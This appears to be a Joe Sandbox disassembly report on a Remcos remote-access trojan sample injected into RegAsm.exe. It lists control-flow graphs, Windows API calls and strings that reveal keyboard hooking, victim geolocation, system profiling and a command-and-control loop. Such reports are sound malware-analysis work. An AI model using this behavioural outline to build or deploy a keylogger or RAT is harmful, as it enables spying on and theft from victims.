                                                                control_flow_graph 1666 40a2f3-40a30a 1667 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1666->1667 1668 40a36e-40a37e GetMessageA 1666->1668 1667->1668 1671 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1667->1671 1669 40a380-40a398 TranslateMessage DispatchMessageA 1668->1669 1670 40a39a 1668->1670 1669->1668 1669->1670 1672 40a39c-40a3a1 1670->1672 1671->1672
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetMessageA.USER32 ref: 0040A376
                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                • DispatchMessageA.USER32 ref: 0040A390
                                                                Strings
                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                • String ID: Keylogger initialization failure: error
                                                                • API String ID: 3219506041-952744263
                                                                • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1748 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1755 10001177-1000119e lstrlenW FindFirstFileW 1748->1755 1756 10001168-10001172 lstrlenW 1748->1756 1757 100011a0-100011a8 1755->1757 1758 100011e1-100011e9 1755->1758 1756->1755 1759 100011c7-100011d8 FindNextFileW 1757->1759 1760 100011aa-100011c4 call 10001000 1757->1760 1759->1757 1762 100011da-100011db FindClose 1759->1762 1760->1759 1762->1758
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                • String ID:
                                                                • API String ID: 1083526818-0
                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                APIs
                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                APIs
                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                                • API String ID: 2281282204-2344886030
                                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00929AE0), ref: 004338DA
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                Strings
                                                                • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Time$FileSystem
                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                • API String ID: 2086374402-595813830
                                                                • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction Fuzzy Hash:

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 94 40ef2c 89->94 95 40ec57 90->95 96 40ec59-40ec65 call 41b354 90->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 143 40eca4-40ecaa 140->143 143->107 147 40ecac call 40729b 143->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                APIs
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-O0U3JA$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                • API String ID: 2830904901-2016838540
                                                                • Opcode ID: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                • Opcode Fuzzy Hash: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
